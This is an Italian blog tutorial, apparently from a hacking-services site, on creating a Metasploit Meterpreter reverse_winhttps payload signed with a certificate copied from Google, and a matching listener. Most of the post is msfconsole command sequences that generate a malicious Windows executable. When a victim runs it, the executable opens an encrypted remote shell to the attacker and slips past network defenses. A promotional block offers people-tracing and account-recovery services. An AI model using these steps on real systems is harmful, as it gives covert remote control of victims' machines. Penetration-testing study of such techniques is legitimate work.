Sessioni Meterpreter certificate SSL

In questo articolo della rubrica su Metasploit Framework, spiego come stabilire una sessione di Meterpreter protetta da un certificato SSL valido. Questa semplice ma efficace tecnica, conosciuta anche come Meterpreter Paranoid Mode, ci permette di attuare pentest anche in ambienti con difese piuttosto avanzate, al contempo evita che qualche malintenzionato si impadronisca delle nostre shell abbandonate.

In breve consiste nel creare un payload di tipo reverse_https assegnandogli un certificato SSL riconosciuto e avviare un listener che utilizzi lo stesso certificato per stabilire una connessione criptata tra attacker e vittima. C’è anche uno script automatico che permette questa operazione in maniera piuttosto agevole, ma chiaramente io vi mostro il metodo manuale: è comunque semplice da mettere in atto, permette di capire più a fondo ciò che stiamo facendo e può essere personalizzato maggiormente a seconda delle singole esigenze di ognuno.

 

Requisiti

Per portare a termine questa guida, ho utilizzato Metasploit Framework su Kali Linux Rolling installato su drive come macchina attaccante e una macchina virtuale di VMware Workstation Player con installato Windows 7 Ultimate SP 1. Effettivamente Windows 7 non è proprio l’ultimissimo SO, ma c’è da considerare che c’è chi ancora utilizza Windows XP e che una licenza Windows 10 costa davvero tanto. Nel caso in cui volessi che i prossimi tutorial fossero realizzati con Win 10, visita questa pagina e prova a cliccare sul pulsante!

 

Creare un payload certificato SSL con msfconsole

Passiamo alla guida vera e propria, più precisamente con la creazione del payload. Finora abbiamo creato i nostri payload con msfvenom e una semplice linea di comando. Dato che per firmare il payload con un certificato SSL abbiamo bisogno di un modulo ausiliario di Metasploit chiamato impersonate_ssl, questa volta andremo a crearlo direttamente da msfconsole. Vediamo come!

 

Copia del certificato

Come prima operazione utilizziamo il modulo ausiliario impersonate_ssl per copiare un certificato attendibile, io ho scelto quello di Google.

use auxiliary/gather/impersonate_ssl set RHOST www.google.com run

 

Meterpreter Paranoid Mode - Sessione certificata SSL

Lo script si occupa di copiare chiave e certificati e di riportare la loro posizione a video.

 

Creazione del payload

Cambiamo il contesto di msfconsole, configuriamo i parametri necessari affinché il payload includa il certificato e lanciamo lo script per la creazione

use payload/windows/meterpreter/reverse_winhttps set LHOST [ip_della_macchina_attaccante] set LPORT [porta_per_la_connessione] set HANDLERSSLCERT [percorso_della_chiave_pem] set StagerVerifySSLCert true generate -t exe -f [percorso_e_nome_del_payload]

 

Meterpreter Paranoid Mode - Sessione certificata SSL

 

Una volta creato il payload, possiamo spostarlo sulla vittima.

Meterpreter Paranoid Mode - Sessione certificata SSL

 

Aprire un listener con certificato SSL attivo

A questo punto, in attesa che la vittima avvii il software malevolo, impostiamo un listener molto simile a quelli generici usati negli articoli precedenti. L’unico particolare che differenzia questo dagli altri è un invito esplicito a utilizzare il certificato copiato da Google e incorporato nel payload.

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_winhttps set LHOST [ip_della_macchina_attaccante] set LPORT [porta_per_la_connessione] set HANDLERSSLCERT [percorso_della_chiave_pem] set StagerVerifySSLCert true run

 

Meterpreter Paranoid Mode - Sessione certificata SSL

 

La sessione Meterpreter criptata è attiva

Nel momento in cui la vittima esegue il file malevolo, la sessione di Meterpreter protetta da certificato SSL viene visualizzata sulla macchina attaccante.

Meterpreter Paranoid Mode - Sessione certificata SSL

Baty’s Base

STAI CERCANDO PRODOTTI PER L’HACKING, LA SICUREZZA INFORMATICA E IL PENETRATION TESTING? HAI BISOGNO DI BONIFICARE IL TUO SMARTPHONE, IL TUO PC O IL TUO SITO DA VIRUS E MALWARE? DEVI RINTRACCIARE UNA PERSONA O RECUPERARE DELLE INFORMAZIONI URGENTI? DEVI RIPRENDERE POSSESSO DI UN ACCOUNT, UNA MAIL O DI UNA PASSWORD CHE TI HANNO SOTTRATTO? VUOI ACQUISTARE DEVICE GIÀ CONFIGURATI PER SPERIMENTARE TUTTE LE TECNICHE DI HACKING IN MODO FACILE E VELOCE? HAI ESIGENZE PARTICOLARI IN AMBITO SOFTWARE O HARDWARE?POSSIAMO AIUTARTI  ! CLICCA SUBITO SUL BOTTONE ROSSO QUI SOTTO OPPURE CONTATTACI TRAMITE WHATSAPP O COMPILANDO E INVIANDO IL MODULO SOTTOSTANTE.

chevron_left
chevron_right

Disclaimer : Tutte le tecniche, i prodotti e i servizi presenti o descritti su questo sito si intendono a scopo puramente informativo, di studio o di aggiornamento professionale e per testare esclusivamente la sicurezza e la funzionalità della propria rete informatica o degli account di cui si è legittimi proprietari o per i quali si dispone l'autorizzazione ad attività di hardening o di penetration testing da parte dei legittimi titolari in accordo alle vigenti normative sull'accesso a sistemi informatici e telematici (cfr. art. 615 ter c.p. e successive modifiche). HackerSecret declina ogni responsabilità per ogni ulteriore utilizzo al di fuori di tale ambito che è di esclusiva resposabilità individuale ai sensi delle vigenti leggi e per eventuali danni o problematiche causate dall'utilizzo delle tecniche, dei prodotti o dei servizi presenti o descritti nel sito ai propri sistemi o apparati informatici o per la perdita di dati sensibili e non conseguente all'utilizzo di tali tecniche, prodotti o servizi.